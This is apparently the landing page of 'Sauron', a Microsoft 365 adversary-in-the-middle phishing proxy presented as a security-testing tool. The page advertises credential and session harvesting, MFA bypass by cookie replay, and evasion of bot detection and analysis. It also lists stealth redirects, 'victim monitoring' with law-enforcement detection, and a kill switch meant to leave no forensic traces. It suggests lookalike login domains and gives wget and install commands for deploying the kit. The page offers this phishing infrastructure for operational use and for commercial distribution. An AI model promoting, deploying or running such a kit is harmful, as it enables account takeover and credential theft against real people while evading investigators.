Sauron

Advanced Microsoft 365 MITM Proxy for Security Testing

Capture credentials, harvest sessions, and monitor Microsoft 365 login flows in real-time with advanced evasion techniques and professional-grade infrastructure.

Quick Start Download Latest Release

Powerful Features

Built for security professionals who need reliable, advanced phishing infrastructure with enterprise-grade capabilities.

TLS Interception

Full SSL/TLS MITM with automatic certificate generation and seamless Microsoft 365 flow capture.

Real-time Monitoring

WebSocket dashboard for live operation tracking with instant credential and session capture notifications.

2FA Bypass

Captures MFA tokens and maintains session persistence through cookie harvesting and replay attacks.

Advanced Evasion

Bot detection bypass, traffic obfuscation, and anti-analysis measures to evade modern security systems.

Slug Management

Isolated operations with unique slugs, real-time statistics, and multi-target coordination capabilities.

Auto Infrastructure

Automatic SSL certificates, DNS management, and Cloudflare integration for professional-grade infrastructure.

🔴 Kill Switch System

Emergency VPS destruction with 5-stage annihilation, dead man's switch, and zero forensic traces.

🚀 Fleet Management

Distributed VPS control with master/agent architecture, heartbeat monitoring, and command dispatch.

🛡️ Access Protection

Smart redirect system blocks unauthorized visitors, redirecting them to real Microsoft services for stealth.

Quick Installation

Get up and running in minutes with our streamlined setup process

Requirements

  • Ubuntu 20.04+ server with root access
  • Domain name (any registrar)
  • Cloudflare account (free)

Domain Examples

Choose professional-looking domains:

  • securelogin365.com
  • authservice.com
  • cloudplatform.com

Installation Steps

# Download latest release
wget https://github.com/Skillz147/Sauron-Pro/releases/latest/download/sauron-linux-amd64.tar.gz

# Extract and setup
tar -xzf sauron-linux-amd64.tar.gz
cd sauron

# Interactive configuration
./configure-env.sh setup

# Install and start
sudo ./install-production.sh

💡 Tip: The interactive setup will guide you through getting your Cloudflare API token and Turnstile secret.

Documentation

Comprehensive guides and technical documentation for the Sauron MITM proxy system.

🚀

Setup Guide

Complete installation and configuration walkthrough
⚙️

Configuration

Environment variables, SSL, and system settings
🔗

Slug Management

Creating and managing operation slugs
🔒

Security Features

AES-256 encryption, threat detection, and anti-forensics
🛡️

Security Headers NEW

HTTP security headers, CSP policies, and CORS configuration
🔍

Victim Monitoring System

Law enforcement detection and automatic response system
🚀

Deployment Strategies

Enterprise scaling and commercial distribution
🔧

Admin API

Administrative endpoints and cleanup operations
🔗

API Reference UPDATED

Complete API documentation with Firestore authentication
🔐

Firestore Authentication NEW

Advanced HMAC proof-of-possession authentication system
📋

API Parameters Reference NEW

Comprehensive parameter guide for all endpoints
📊

WebSocket Dashboard

Real-time monitoring and data capture
🛠️

Troubleshooting

Common issues and their solutions

Fleet Management

Distributed VPS control and command system
🚁

Complete Fleet Guide

Comprehensive fleet setup, operations, and security
🔴

Kill Switch System

Emergency VPS destruction system
📡

Complete API Reference

Fleet, VPS, analytics, and monitoring endpoints
📋

API Parameters Reference

Essential parameters, commands, and authentication methods
💀

Kill Switch Manual

Complete operation procedures (TOP SECRET)

Support & Community

Get help, report issues, and connect with other users

GitHub Issues

Report bugs, request features, and get technical support

Open Issue →

Documentation

Comprehensive guides and API references

Browse Docs →

Security Reports

Report security vulnerabilities privately

Contact Security →